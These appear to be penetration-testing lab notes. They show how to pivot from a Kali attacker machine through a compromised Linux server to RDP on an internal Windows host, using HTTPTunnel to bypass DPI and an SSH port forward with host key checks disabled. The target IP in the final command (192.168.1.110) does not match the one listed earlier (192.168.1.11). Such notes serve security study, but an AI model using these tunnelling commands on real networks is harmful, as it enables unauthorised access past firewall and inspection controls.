Scenario

Goal

RDP over HTTP from Kali to Windows Server in internal network using HTTPTunnel.

What we already have or know:

  • A fully compromised Linux machine connected to internal network
  • The Linux shell is HTTP-based (port 443)
  • The firewall only allows inbound traffic on port 80, 443, 1234
  • No service is actively listening on port 1234 on the Linux machine
  • Hosts
    • Kali (attacker machine)
    • Linux (compromised server): 10.11.0.123
    • Windows (target in the internal network): 192.168.1.11

Execution

  • Establish a HTTP-based Tunnel from Kali 8080 to Linux 1234 (bypass DPI)
    • On Kali: htc --forward-port 8080 10.11.0.123:1234
    • --forward-port here specifies the listener on Kali
  • Decapsulate HTTP Tunnel traffic from Linux 1234 and output to Linux 8888 (RDP doesn’t understand HTTP tunneling)
    • On Linux: hts --forward-port localhost:8888 1234
    • --forward-port here specifies where the decapsulated traffic will be forwarded to
  • Establish an SSH local port forward from Linux 8888 to Windows 3389 (RDP)
    • On Linux: ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -NfL 0.0.0.0:8888:192.168.1.110:3389 user@localhost